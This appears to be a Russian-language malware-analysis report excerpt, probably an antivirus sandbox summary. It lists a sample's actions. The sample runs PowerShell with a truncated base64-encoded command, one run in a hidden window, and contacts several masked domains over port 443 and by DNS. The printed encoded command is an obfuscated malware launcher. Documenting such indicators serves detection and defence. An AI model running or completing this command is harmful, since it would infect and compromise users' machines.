Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABDADAAdAB0AGkANQBPAHUAPQAnAFkAQwBzAEEAcQB3AFMAJwA7ACQAZgBCAFgANAA1AHAAdgBQACAAPQAgACcANAA0ADkAJwA7ACQAcQBvAFIAVAB3AHoASABNAD0AJwBNADMAaQBjAHMAbwA1ACcAOwAkAGoARwBuAGoAagBPAFAAPQAkAGUAbg...
- 'it##adz.com':443
- 'br#####bout-town.com':443
- 'sa#####bangalore.com':443
- 'it##adz.com':443
- 'br#####bout-town.com':443
- 'sa#####bangalore.com':443
- DNS ASK ne####emedia.net
- DNS ASK it##adz.com
- DNS ASK br#####bout-town.com
- DNS ASK sa#####bangalore.com
- DNS ASK st####ingvf.cloud
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABDADAAdAB0AGkANQBPAHUAPQAnAFkAQwBzAEEAcQB3AFMAJwA7ACQAZgBCAFgANAA1AHAAdgBQACAAPQAgACcANAA0ADkAJwA7ACQAcQBvAFIAVAB3AHoASABNAD0AJwBNADMAaQBjAHMAbwA1ACcAOwAkAGoARwBuAGoAagBPAFAAPQAkAGUAbg...' (со скрытым окном)